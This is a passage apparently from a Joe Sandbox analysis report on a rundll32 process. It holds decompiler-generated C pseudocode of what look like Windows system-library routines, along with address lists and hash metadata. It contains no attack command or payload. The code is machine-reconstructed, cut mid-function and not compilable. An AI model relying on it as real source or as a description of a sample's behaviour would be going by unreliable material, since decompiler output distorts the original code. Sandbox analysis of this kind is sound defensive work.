                                                                                            				intOrPtr _v28;
                                                                                            				signed int _v32;
                                                                                            				void* _v36;
                                                                                            				char _v48;
                                                                                            				signed int _v52;
                                                                                            				signed int _v56;
                                                                                            				unsigned int _v60;
                                                                                            				char _v64;
                                                                                            				unsigned int _v68;
                                                                                            				signed int _v72;
                                                                                            				char _v73;
                                                                                            				signed int _v74;
                                                                                            				char _v75;
                                                                                            				signed int _v76;
                                                                                            				void* _v81;
                                                                                            				void* _v82;
                                                                                            				void* _v89;
                                                                                            				void* _v92;
                                                                                            				void* _v97;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				signed char _t128;
                                                                                            				void* _t129;
                                                                                            				signed int _t130;
                                                                                            				void* _t132;
                                                                                            				signed char _t133;
                                                                                            				intOrPtr _t135;
                                                                                            				signed int _t137;
                                                                                            				signed int _t140;
                                                                                            				signed int* _t144;
                                                                                            				signed int* _t145;
                                                                                            				intOrPtr _t146;
                                                                                            				signed int _t147;
                                                                                            				signed char* _t148;
                                                                                            				signed int _t149;
                                                                                            				signed int _t153;
                                                                                            				signed int _t169;
                                                                                            				signed int _t174;
                                                                                            				signed int _t180;
                                                                                            				void* _t197;
                                                                                            				void* _t198;
                                                                                            				signed int _t201;
                                                                                            				intOrPtr* _t202;
                                                                                            				intOrPtr* _t205;
                                                                                            				signed int _t210;
                                                                                            				signed int _t215;
                                                                                            				signed int _t218;
                                                                                            				signed char _t221;
                                                                                            				signed int _t226;
                                                                                            				char _t227;
                                                                                            				signed int _t228;
                                                                                            				void* _t229;
                                                                                            				unsigned int _t231;
                                                                                            				void* _t235;
                                                                                            				signed int _t240;
                                                                                            				signed int _t241;
                                                                                            				void* _t242;
                                                                                            				signed int _t246;
                                                                                            				signed int _t248;
                                                                                            				signed int _t252;
                                                                                            				signed int _t253;
                                                                                            				void* _t254;
                                                                                            				intOrPtr* _t256;
                                                                                            				intOrPtr _t257;
                                                                                            				unsigned int _t262;
                                                                                            				signed int _t265;
                                                                                            				void* _t267;
                                                                                            				signed int _t275;
                                                                                            
                                                                                            				_t198 = __ebx;
                                                                                            				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                                            				_v68 = __ecx;
                                                                                            				_v73 = 0;
                                                                                            				_t201 = __edx & 0x00002000;
                                                                                            				_t128 = __edx & 0xffffdfff;
                                                                                            				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                                            				_v72 = _t128;
                                                                                            				if((_t128 & 0x00000008) != 0) {
                                                                                            					__eflags = _t128 - 8;
                                                                                            					if(_t128 != 8) {
                                                                                            						L69:
                                                                                            						_t129 = 0xc000000d;
                                                                                            						goto L23;
                                                                                            					} else {
                                                                                            						_t130 = 0;
                                                                                            						_v72 = 0;
                                                                                            						_v75 = 1;
                                                                                            						L2:
                                                                                            						_v74 = 1;
                                                                                            						_t226 =  *0x46c8714; // 0x0
                                                                                            						if(_t226 != 0) {
                                                                                            							__eflags = _t201;
                                                                                            							if(_t201 != 0) {
                                                                                            								L62:
                                                                                            								_v74 = 1;
                                                                                            								L63:
                                                                                            								_t130 = _t226 & 0xffffdfff;
                                                                                            								_v72 = _t130;
                                                                                            								goto L3;
                                                                                            							}
                                                                                            							_v74 = _t201;
                                                                                            							__eflags = _t226 & 0x00002000;
                                                                                            							if((_t226 & 0x00002000) == 0) {
                                                                                            								goto L63;
                                                                                            							}
                                                                                            							goto L62;
                                                                                            						}
                                                                                            						L3:
                                                                                            						_t227 = _v75;
                                                                                            						L4:
                                                                                            						_t240 = 0;
                                                                                            						_v56 = 0;
                                                                                            						_t252 = _t130 & 0x00000100;
                                                                                            						if(_t252 != 0 || _t227 != 0) {
                                                                                            							_t240 = _v68;
                                                                                            							_t132 = E04602EB0(_t240);
                                                                                            							__eflags = _t132 - 2;
                                                                                            							if(_t132 != 2) {
                                                                                            								__eflags = _t132 - 1;
                                                                                            								if(_t132 == 1) {
                                                                                            									goto L25;
                                                                                            								}
                                                                                            								__eflags = _t132 - 6;
                                                                                            								if(_t132 == 6) {
                                                                                            									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                                            									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                                            										goto L40;
                                                                                            									}
                                                                                            									_t197 = E04602EB0(_t240 + 8);
                                                                                            									__eflags = _t197 - 2;
                                                                                            									if(_t197 == 2) {
                                                                                            										goto L25;
                                                                                            									}
                                                                                            								}
                                                                                            								L40:
                                                                                            								_t133 = 1;
                                                                                            								L26:
                                                                                            								_t228 = _v75;
                                                                                            								_v56 = _t240;
                                                                                            								__eflags = _t133;
                                                                                            								if(_t133 != 0) {
                                                                                            									__eflags = _t228;
                                                                                            									if(_t228 == 0) {
                                                                                            										L43:
                                                                                            										__eflags = _v72;
                                                                                            										if(_v72 == 0) {
                                                                                            											goto L8;
                                                                                            										}
                                                                                            										goto L69;
                                                                                            									}
                                                                                            									_t133 = E045D58EC(_t240);
                                                                                            									_t221 =  *0x46c5cac; // 0x16
                                                                                            									__eflags = _t221 & 0x00000040;
                                                                                            									if((_t221 & 0x00000040) != 0) {
                                                                                            										_t228 = 0;
                                                                                            										__eflags = _t252;
                                                                                            										if(_t252 != 0) {
                                                                                            											goto L43;
                                                                                            										}
                                                                                            										_t133 = _v72;
                                                                                            										goto L7;
                                                                                            									}
                                                                                            									goto L43;
                                                                                            								} else {
                                                                                            									_t133 = _v72;
                                                                                            									goto L6;
                                                                                            								}
                                                                                            							}
                                                                                            							L25:
                                                                                            							_t133 = _v73;
                                                                                            							goto L26;
                                                                                            						} else {
                                                                                            							L6:
                                                                                            							_t221 =  *0x46c5cac; // 0x16
                                                                                            							L7:
                                                                                            							if(_t133 != 0) {
                                                                                            								__eflags = _t133 & 0x00001000;
                                                                                            								if((_t133 & 0x00001000) != 0) {
                                                                                            									_t133 = _t133 | 0x00000a00;
                                                                                            									__eflags = _t221 & 0x00000004;
                                                                                            									if((_t221 & 0x00000004) != 0) {
                                                                                            										_t133 = _t133 | 0x00000400;
                                                                                            									}
                                                                                            								}
                                                                                            								__eflags = _t228;
                                                                                            								if(_t228 != 0) {
                                                                                            									_t133 = _t133 | 0x00000100;
                                                                                            								}
                                                                                            								_t229 = E04614A2C(0x46c6e40, 0x4614b30, _t133, _t240);
                                                                                            								__eflags = _t229;
                                                                                            								if(_t229 == 0) {
                                                                                            									_t202 = _a20;
                                                                                            									goto L100;
                                                                                            								} else {
                                                                                            									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                                            									L15:
                                                                                            									_t202 = _a20;
                                                                                            									 *_t202 = _t135;
                                                                                            									if(_t229 == 0) {
                                                                                            										L100:
                                                                                            										 *_a4 = 0;
                                                                                            										_t137 = _a8;
                                                                                            										__eflags = _t137;
                                                                                            										if(_t137 != 0) {
                                                                                            											 *_t137 = 0;
                                                                                            										}
                                                                                            										 *_t202 = 0;
                                                                                            										_t129 = 0xc0000017;
                                                                                            										goto L23;
                                                                                            									} else {
                                                                                            										_t242 = _a16;
                                                                                            										if(_t242 != 0) {
                                                                                            											_t254 = _t229;
                                                                                            											memcpy(_t242, _t254, 0xd << 2);
                                                                                            											_t267 = _t267 + 0xc;
                                                                                            											_t242 = _t254 + 0x1a;
                                                                                            										}
                                                                                            										_t205 = _a4;
                                                                                            										_t25 = _t229 + 0x48; // 0x48
                                                                                            										 *_t205 = _t25;
                                                                                            										_t140 = _a8;
                                                                                            										if(_t140 != 0) {
                                                                                            											__eflags =  *((char*)(_t267 + 0xa));
                                                                                            											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                                            												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                                            											} else {
                                                                                            												 *_t140 = 0;
                                                                                            											}
                                                                                            										}
                                                                                            										_t256 = _a12;
                                                                                            										if(_t256 != 0) {
                                                                                            											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                                            										}
                                                                                            										_t257 =  *_t205;
                                                                                            										_v48 = 0;
                                                                                            										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                                            										_v56 = 0;
                                                                                            										_v52 = 0;
                                                                                            										_t144 =  *( *[fs:0x30] + 0x50);
                                                                                            										if(_t144 != 0) {
                                                                                            											__eflags =  *_t144;
                                                                                            											if( *_t144 == 0) {
                                                                                            												goto L20;
                                                                                            											}
                                                                                            											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                            											goto L21;
                                                                                            										} else {
                                                                                            											L20:
                                                                                            											_t145 = 0x7ffe0384;
                                                                                            											L21:
                                                                                            											if( *_t145 != 0) {
                                                                                            												_t146 =  *[fs:0x30];
                                                                                            												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                                            												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                                            													_t147 = E045F7D50();
                                                                                            													__eflags = _t147;
                                                                                            													if(_t147 == 0) {
                                                                                            														_t148 = 0x7ffe0385;
                                                                                            													} else {
                                                                                            														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                            													}
                                                                                            													__eflags =  *_t148 & 0x00000020;
                                                                                            													if(( *_t148 & 0x00000020) != 0) {
                                                                                            														_t149 = _v72;
                                                                                            														__eflags = _t149;
                                                                                            														if(__eflags == 0) {
                                                                                            															_t149 = 0x45b5c80;
                                                                                            														}
                                                                                            														_push(_t149);
                                                                                            														_push( &_v48);
                                                                                            														 *((char*)(_t267 + 0xb)) = E0460F6E0(_t198, _t242, _t257, __eflags);
                                                                                            														_push(_t257);
                                                                                            														_push( &_v64);
                                                                                            														_t153 = E0460F6E0(_t198, _t242, _t257, __eflags);
                                                                                            														__eflags =  *((char*)(_t267 + 0xb));
                                                                                            														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                            															__eflags = _t153;
                                                                                            															if(_t153 != 0) {
                                                                                            																__eflags = 0;
                                                                                            																E04657016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                                            																L045F2400(_t267 + 0x20);
                                                                                            															}
                                                                                            															L045F2400( &_v64);
                                                                                            														}
                                                                                            													}
                                                                                            												}
                                                                                            											}
                                                                                            											_t129 = 0;
                                                                                            											L23:
                                                                                            											return _t129;
                                                                                            										}
                                                                                            									}
                                                                                            								}
                                                                                            							}
                                                                                            							L8:
                                                                                            							_t275 = _t240;
                                                                                            							if(_t275 != 0) {
                                                                                            								_v73 = 0;
                                                                                            								_t253 = 0;
                                                                                            								__eflags = 0;
                                                                                            								L29:
                                                                                            								_push(0);
                                                                                            								_t241 = E04602397(_t240);
                                                                                            								__eflags = _t241;
                                                                                            								if(_t241 == 0) {
                                                                                            									_t229 = 0;
                                                                                            									L14:
                                                                                            									_t135 = 0;
                                                                                            									goto L15;
                                                                                            								}
                                                                                            								__eflags =  *((char*)(_t267 + 0xb));
                                                                                            								 *(_t241 + 0x34) = 1;
                                                                                            								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                            									E045F2280(_t134, 0x46c8608);
                                                                                            									__eflags =  *0x46c6e48 - _t253; // 0x29fd6a8
                                                                                            									if(__eflags != 0) {
                                                                                            										L48:
                                                                                            										_t253 = 0;
                                                                                            										__eflags = 0;
                                                                                            										L49:
                                                                                            										E045EFFB0(_t198, _t241, 0x46c8608);
                                                                                            										__eflags = _t253;
                                                                                            										if(_t253 != 0) {
                                                                                            											L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                                            										}
                                                                                            										goto L31;
                                                                                            									}
                                                                                            									 *0x46c6e48 = _t241;
                                                                                            									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                                            									__eflags = _t253;
                                                                                            									if(_t253 != 0) {
                                                                                            										_t57 = _t253 + 0x34;
                                                                                            										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                                                            										__eflags =  *_t57;
                                                                                            										if( *_t57 == 0) {
                                                                                            											goto L49;
                                                                                            										}
                                                                                            									}
                                                                                            									goto L48;
                                                                                            								}
                                                                                            								L31:
                                                                                            								_t229 = _t241;
                                                                                            								goto L14;
                                                                                            							}
                                                                                            							_v73 = 1;
                                                                                            							_v64 = _t240;
                                                                                            							asm("lock bts dword [esi], 0x0");
                                                                                            							if(_t275 < 0) {
                                                                                            								_t231 =  *0x46c8608; // 0x0
                                                                                            								while(1) {
                                                                                            									_v60 = _t231;
                                                                                            									__eflags = _t231 & 0x00000001;
                                                                                            									if((_t231 & 0x00000001) != 0) {
                                                                                            										goto L76;
                                                                                            									}
                                                                                            									_t73 = _t231 + 1; // 0x1
                                                                                            									_t210 = _t73;
                                                                                            									asm("lock cmpxchg [edi], ecx");
                                                                                            									__eflags = _t231 - _t231;
                                                                                            									if(_t231 != _t231) {
                                                                                            										L92:
                                                                                            										_t133 = E04606B90(_t210,  &_v64);
                                                                                            										_t262 =  *0x46c8608; // 0x0
                                                                                            										L93:
                                                                                            										_t231 = _t262;
                                                                                            										continue;
                                                                                            									}
                                                                                            									_t240 = _v56;
                                                                                            									goto L10;
                                                                                            									L76:
                                                                                            									_t169 = E0460E180(_t133);
                                                                                            									__eflags = _t169;
                                                                                            									if(_t169 != 0) {
                                                                                            										_push(0xc000004b);
                                                                                            										_push(0xffffffff);
                                                                                            										E046197C0();
                                                                                            										_t231 = _v68;
                                                                                            									}
                                                                                            									_v72 = 0;
                                                                                            									_v24 =  *( *[fs:0x18] + 0x24);
                                                                                            									_v16 = 3;
                                                                                            									_v28 = 0;
                                                                                            									__eflags = _t231 & 0x00000002;
                                                                                            									if((_t231 & 0x00000002) == 0) {
                                                                                            										_v32 =  &_v36;
                                                                                            										_t174 = _t231 >> 4;
                                                                                            										__eflags = 1 - _t174;
                                                                                            										_v20 = _t174;
                                                                                            										asm("sbb ecx, ecx");
                                                                                            										_t210 = 3 |  &_v36;
                                                                                            										__eflags = _t174;
                                                                                            										if(_t174 == 0) {
                                                                                            											_v20 = 0xfffffffe;
                                                                                            										}
                                                                                            									} else {
                                                                                            										_v32 = 0;
                                                                                            										_v20 = 0xffffffff;
                                                                                            										_v36 = _t231 & 0xfffffff0;
                                                                                            										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                                            										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                                            									}
                                                                                            									asm("lock cmpxchg [edi], esi");
                                                                                            									_t262 = _t231;
                                                                                            									__eflags = _t262 - _t231;
                                                                                            									if(_t262 != _t231) {
                                                                                            										goto L92;
                                                                                            									} else {
                                                                                            										__eflags = _v72;
                                                                                            										if(_v72 != 0) {
                                                                                            											E0461006A(0x46c8608, _t210);
                                                                                            										}
                                                                                            										__eflags =  *0x7ffe036a - 1;
                                                                                            										if(__eflags <= 0) {
                                                                                            											L89:
                                                                                            											_t133 =  &_v16;
                                                                                            											asm("lock btr dword [eax], 0x1");
                                                                                            											if(__eflags >= 0) {
                                                                                            												goto L93;
                                                                                            											} else {
                                                                                            												goto L90;
                                                                                            											}
                                                                                            											do {
                                                                                            												L90:
                                                                                            												_push(0);
                                                                                            												_push(0x46c8608);
                                                                                            												E0461B180();
                                                                                            												_t133 = _v24;
                                                                                            												__eflags = _t133 & 0x00000004;
                                                                                            											} while ((_t133 & 0x00000004) == 0);
                                                                                            											goto L93;
                                                                                            										} else {
                                                                                            											_t218 =  *0x46c6904; // 0x400
                                                                                            											__eflags = _t218;
                                                                                            											if(__eflags == 0) {
                                                                                            												goto L89;
                                                                                            											} else {
                                                                                            												goto L87;
                                                                                            											}
                                                                                            											while(1) {
                                                                                            												L87:
                                                                                            												__eflags = _v16 & 0x00000002;
                                                                                            												if(__eflags == 0) {
                                                                                            													goto L89;
                                                                                            												}
                                                                                            												asm("pause");
                                                                                            												_t218 = _t218 - 1;
                                                                                            												__eflags = _t218;
                                                                                            												if(__eflags != 0) {
                                                                                            													continue;
                                                                                            												}
                                                                                            												goto L89;
                                                                                            											}
                                                                                            											goto L89;
                                                                                            										}
                                                                                            									}
                                                                                            								}
                                                                                            							}
                                                                                            							L10:
                                                                                            							_t229 =  *0x46c6e48; // 0x29fd6a8
                                                                                            							_v72 = _t229;
                                                                                            							if(_t229 == 0) {
                                                                                            								L45:
                                                                                            								E045EFFB0(_t198, _t240, 0x46c8608);
                                                                                            								_t253 = _v76;
                                                                                            								goto L29;
                                                                                            							}
                                                                                            							if( *((char*)(_t229 + 0x40)) != 0) {
                                                                                            								L13:
                                                                                            								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                                            								asm("lock cmpxchg [esi], ecx");
                                                                                            								_t215 = 1;
                                                                                            								if(1 != 1) {
                                                                                            									while(1) {
                                                                                            										_t246 = _t215 & 0x00000006;
                                                                                            										_t180 = _t215;
                                                                                            										__eflags = _t246 - 2;
                                                                                            										_v56 = _t246;
                                                                                            										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                            										_t248 = _v56;
                                                                                            										__eflags = _t180 - _t215;
                                                                                            										if(_t180 == _t215) {
                                                                                            											break;
                                                                                            										}
                                                                                            										_t215 = _t180;
                                                                                            									}
                                                                                            									__eflags = _t248 - 2;
                                                                                            									if(_t248 == 2) {
                                                                                            										__eflags = 0;
                                                                                            										E046100C2(0x46c8608, 0, _t235);
                                                                                            									}
                                                                                            									_t229 = _v72;
                                                                                            								}
                                                                                            								goto L14;
                                                                                            							}
                                                                                            							_t18 = _t229 + 0x38; // 0x9
                                                                                            							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                            								goto L45;
                                                                                            							}
                                                                                            							goto L13;
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				_t227 = 0;
                                                                                            				_v75 = 0;
                                                                                            				if(_t128 != 0) {
                                                                                            					goto L4;
                                                                                            				}
                                                                                            				goto L2;
                                                                                            			}











































































                                                                                            0x04645aca
                                                                                            0x04645ad4
                                                                                            0x04645ad4
                                                                                            0x04645ade
                                                                                            0x04645ade
                                                                                            0x04645aab
                                                                                            0x04645a79
                                                                                            0x04645a52
                                                                                            0x046021f7
                                                                                            0x046021f9
                                                                                            0x046021fe
                                                                                            0x046021fe
                                                                                            0x046021e3
                                                                                            0x04602195
                                                                                            0x0460236c
                                                                                            0x04602122
                                                                                            0x04602122
                                                                                            0x04602124
                                                                                            0x04602231
                                                                                            0x04602236
                                                                                            0x04602236
                                                                                            0x04602238
                                                                                            0x04602238
                                                                                            0x04602240
                                                                                            0x04602242
                                                                                            0x04602244
                                                                                            0x046459fc
                                                                                            0x0460218c
                                                                                            0x0460218c
                                                                                            0x00000000
                                                                                            0x0460218c
                                                                                            0x0460224a
                                                                                            0x0460224f
                                                                                            0x04602256
                                                                                            0x04602304
                                                                                            0x04602309
                                                                                            0x0460230f
                                                                                            0x0460231e
                                                                                            0x0460231e
                                                                                            0x0460231e
                                                                                            0x04602320
                                                                                            0x04602325
                                                                                            0x0460232a
                                                                                            0x0460232c
                                                                                            0x0460233e
                                                                                            0x0460233e
                                                                                            0x00000000
                                                                                            0x0460232c
                                                                                            0x04602311
                                                                                            0x04602317
                                                                                            0x0460231a
                                                                                            0x0460231c
                                                                                            0x04602380
                                                                                            0x04602380
                                                                                            0x04602380
                                                                                            0x04602384
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602386
                                                                                            0x00000000
                                                                                            0x0460231c
                                                                                            0x0460225c
                                                                                            0x0460225c
                                                                                            0x00000000
                                                                                            0x0460225c
                                                                                            0x0460212a
                                                                                            0x04602134
                                                                                            0x04602138
                                                                                            0x0460213d
                                                                                            0x04645858
                                                                                            0x04645863
                                                                                            0x04645863
                                                                                            0x04645867
                                                                                            0x0464586a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464586c
                                                                                            0x0464586c
                                                                                            0x04645871
                                                                                            0x04645875
                                                                                            0x04645877
                                                                                            0x04645997
                                                                                            0x0464599c
                                                                                            0x046459a1
                                                                                            0x046459a7
                                                                                            0x046459a7
                                                                                            0x00000000
                                                                                            0x046459a7
                                                                                            0x0464587d
                                                                                            0x00000000
                                                                                            0x0464588b
                                                                                            0x0464588b
                                                                                            0x04645890
                                                                                            0x04645892
                                                                                            0x04645894
                                                                                            0x04645899
                                                                                            0x0464589b
                                                                                            0x046458a0
                                                                                            0x046458a0
                                                                                            0x046458aa
                                                                                            0x046458b2
                                                                                            0x046458b6
                                                                                            0x046458be
                                                                                            0x046458c6
                                                                                            0x046458c9
                                                                                            0x0464590d
                                                                                            0x04645917
                                                                                            0x0464591a
                                                                                            0x0464591c
                                                                                            0x04645920
                                                                                            0x04645928
                                                                                            0x0464592a
                                                                                            0x0464592c
                                                                                            0x0464592e
                                                                                            0x0464592e
                                                                                            0x046458cb
                                                                                            0x046458cd
                                                                                            0x046458d8
                                                                                            0x046458e0
                                                                                            0x046458f4
                                                                                            0x046458fe
                                                                                            0x046458fe
                                                                                            0x0464593a
                                                                                            0x0464593e
                                                                                            0x04645940
                                                                                            0x04645942
                                                                                            0x00000000
                                                                                            0x04645944
                                                                                            0x04645944
                                                                                            0x04645949
                                                                                            0x0464594e
                                                                                            0x0464594e
                                                                                            0x04645953
                                                                                            0x0464595b
                                                                                            0x04645976
                                                                                            0x04645976
                                                                                            0x0464597a
                                                                                            0x0464597f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645981
                                                                                            0x04645981
                                                                                            0x04645981
                                                                                            0x04645983
                                                                                            0x04645988
                                                                                            0x0464598d
                                                                                            0x04645991
                                                                                            0x04645991
                                                                                            0x00000000
                                                                                            0x0464595d
                                                                                            0x0464595d
                                                                                            0x04645963
                                                                                            0x04645965
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645967
                                                                                            0x04645967
                                                                                            0x0464596b
                                                                                            0x0464596d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464596f
                                                                                            0x04645971
                                                                                            0x04645971
                                                                                            0x04645974
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645974
                                                                                            0x00000000
                                                                                            0x04645967
                                                                                            0x0464595b
                                                                                            0x04645942
                                                                                            0x04645863
                                                                                            0x04602143
                                                                                            0x04602143
                                                                                            0x04602149
                                                                                            0x0460214f
                                                                                            0x046022ec
                                                                                            0x046022f1
                                                                                            0x046022f6
                                                                                            0x00000000
                                                                                            0x046022f6
                                                                                            0x04602159
                                                                                            0x04602173
                                                                                            0x04602173
                                                                                            0x0460217d
                                                                                            0x04602181
                                                                                            0x04602186
                                                                                            0x046459ae
                                                                                            0x046459b2
                                                                                            0x046459b5
                                                                                            0x046459b7
                                                                                            0x046459ba
                                                                                            0x046459cd
                                                                                            0x046459d1
                                                                                            0x046459d5
                                                                                            0x046459d9
                                                                                            0x046459db
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046459dd
                                                                                            0x046459dd
                                                                                            0x046459e1
                                                                                            0x046459e4
                                                                                            0x046459e7
                                                                                            0x046459ee
                                                                                            0x046459ee
                                                                                            0x046459f3
                                                                                            0x046459f3
                                                                                            0x00000000
                                                                                            0x04602186
                                                                                            0x04602164
                                                                                            0x0460216d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460216d
                                                                                            0x04602106
                                                                                            0x04602266
                                                                                            0x046020d8
                                                                                            0x046020da
                                                                                            0x046020e0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d74ebb5626b4bf00a31e31fac1c72b5b80fa681fa77dd95026231cf7a570b65b
                                                                                            • Instruction ID: 47032aadf0724cf4e1f64a78c32d678267c779a737d1b8b38d0061fbefb3a39f
                                                                                            • Opcode Fuzzy Hash: d74ebb5626b4bf00a31e31fac1c72b5b80fa681fa77dd95026231cf7a570b65b
                                                                                            • Instruction Fuzzy Hash: 51F1BF31608341AFDB29CE68C85476B77E1AFD5324F04899DEA969B380F774F841CB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 87%
                                                                                            			E045ED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v20;
                                                                                            				signed int _v36;
                                                                                            				intOrPtr* _v40;
                                                                                            				signed int _v44;
                                                                                            				signed int _v48;
                                                                                            				signed char _v52;
                                                                                            				signed int _v60;
                                                                                            				signed int _v64;
                                                                                            				signed int _v68;
                                                                                            				signed int _v72;
                                                                                            				signed int _v76;
                                                                                            				intOrPtr _v80;
                                                                                            				signed int _v84;
                                                                                            				intOrPtr _v100;
                                                                                            				intOrPtr _v104;
                                                                                            				signed int _v108;
                                                                                            				signed int _v112;
                                                                                            				signed int _v116;
                                                                                            				intOrPtr _v120;
                                                                                            				signed int _v132;
                                                                                            				char _v140;
                                                                                            				char _v144;
                                                                                            				char _v157;
                                                                                            				signed int _v164;
                                                                                            				signed int _v168;
                                                                                            				signed int _v169;
                                                                                            				intOrPtr _v176;
                                                                                            				signed int _v180;
                                                                                            				intOrPtr _v184;
                                                                                            				intOrPtr _v188;
                                                                                            				signed int _v192;
                                                                                            				signed int _v200;
                                                                                            				signed int _v208;
                                                                                            				intOrPtr* _v212;
                                                                                            				char _v216;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				signed int _t204;
                                                                                            				signed int _t206;
                                                                                            				void* _t208;
                                                                                            				signed int _t211;
                                                                                            				signed int _t216;
                                                                                            				intOrPtr _t217;
                                                                                            				intOrPtr* _t218;
                                                                                            				signed int _t226;
                                                                                            				signed int _t239;
                                                                                            				signed int* _t247;
                                                                                            				signed int _t249;
                                                                                            				void* _t252;
                                                                                            				signed int _t256;
                                                                                            				signed int _t269;
                                                                                            				signed int _t271;
                                                                                            				signed int _t277;
                                                                                            				intOrPtr _t279;
                                                                                            				intOrPtr _t283;
                                                                                            				signed int _t287;
                                                                                            				signed int _t288;
                                                                                            				void* _t289;
                                                                                            				signed char _t290;
                                                                                            				signed int _t292;
                                                                                            				signed int* _t293;
                                                                                            				unsigned int _t297;
                                                                                            				signed int _t306;
                                                                                            				signed int _t307;
                                                                                            				signed int _t308;
                                                                                            				signed int _t309;
                                                                                            				signed int _t310;
                                                                                            				intOrPtr _t311;
                                                                                            				intOrPtr _t312;
                                                                                            				signed int _t319;
                                                                                            				intOrPtr _t320;
                                                                                            				signed int* _t324;
                                                                                            				signed int _t337;
                                                                                            				signed int _t338;
                                                                                            				signed int _t339;
                                                                                            				intOrPtr* _t340;
                                                                                            				void* _t341;
                                                                                            				signed int _t344;
                                                                                            				signed int _t348;
                                                                                            				signed int _t349;
                                                                                            				signed int _t351;
                                                                                            				intOrPtr _t353;
                                                                                            				void* _t354;
                                                                                            				signed int _t356;
                                                                                            				signed int _t358;
                                                                                            				intOrPtr _t359;
                                                                                            				signed int _t361;
                                                                                            				signed int _t363;
                                                                                            				signed short* _t365;
                                                                                            				void* _t367;
                                                                                            				intOrPtr _t369;
                                                                                            				void* _t370;
                                                                                            				signed int _t371;
                                                                                            				signed int _t372;
                                                                                            				void* _t374;
                                                                                            				signed int _t376;
                                                                                            				void* _t384;
                                                                                            				signed int _t387;
                                                                                            
                                                                                            				_v8 =  *0x46cd360 ^ _t376;
                                                                                            				_t2 =  &_a20;
                                                                                            				 *_t2 = _a20 & 0x00000001;
                                                                                            				_t287 = _a4;
                                                                                            				_v200 = _a12;
                                                                                            				_t365 = _a8;
                                                                                            				_v212 = _a16;
                                                                                            				_v180 = _a24;
                                                                                            				_v168 = 0;
                                                                                            				_v157 = 0;
                                                                                            				if( *_t2 != 0) {
                                                                                            					__eflags = E045E6600(0x46c52d8);
                                                                                            					if(__eflags == 0) {
                                                                                            						goto L1;
                                                                                            					} else {
                                                                                            						_v188 = 6;
                                                                                            					}
                                                                                            				} else {
                                                                                            					L1:
                                                                                            					_v188 = 9;
                                                                                            				}
                                                                                            				if(_t365 == 0) {
                                                                                            					_v164 = 0;
                                                                                            					goto L5;
                                                                                            				} else {
                                                                                            					_t363 =  *_t365 & 0x0000ffff;
                                                                                            					_t341 = _t363 + 1;
                                                                                            					if((_t365[1] & 0x0000ffff) < _t341) {
                                                                                            						L109:
                                                                                            						__eflags = _t341 - 0x80;
                                                                                            						if(_t341 <= 0x80) {
                                                                                            							_t281 =  &_v140;
                                                                                            							_v164 =  &_v140;
                                                                                            							goto L114;
                                                                                            						} else {
                                                                                            							_t283 =  *0x46c7b9c; // 0x0
                                                                                            							_t281 = L045F4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                                                            							_v164 = _t281;
                                                                                            							__eflags = _t281;
                                                                                            							if(_t281 != 0) {
                                                                                            								_v157 = 1;
                                                                                            								L114:
                                                                                            								E0461F3E0(_t281, _t365[2], _t363);
                                                                                            								_t200 = _v164;
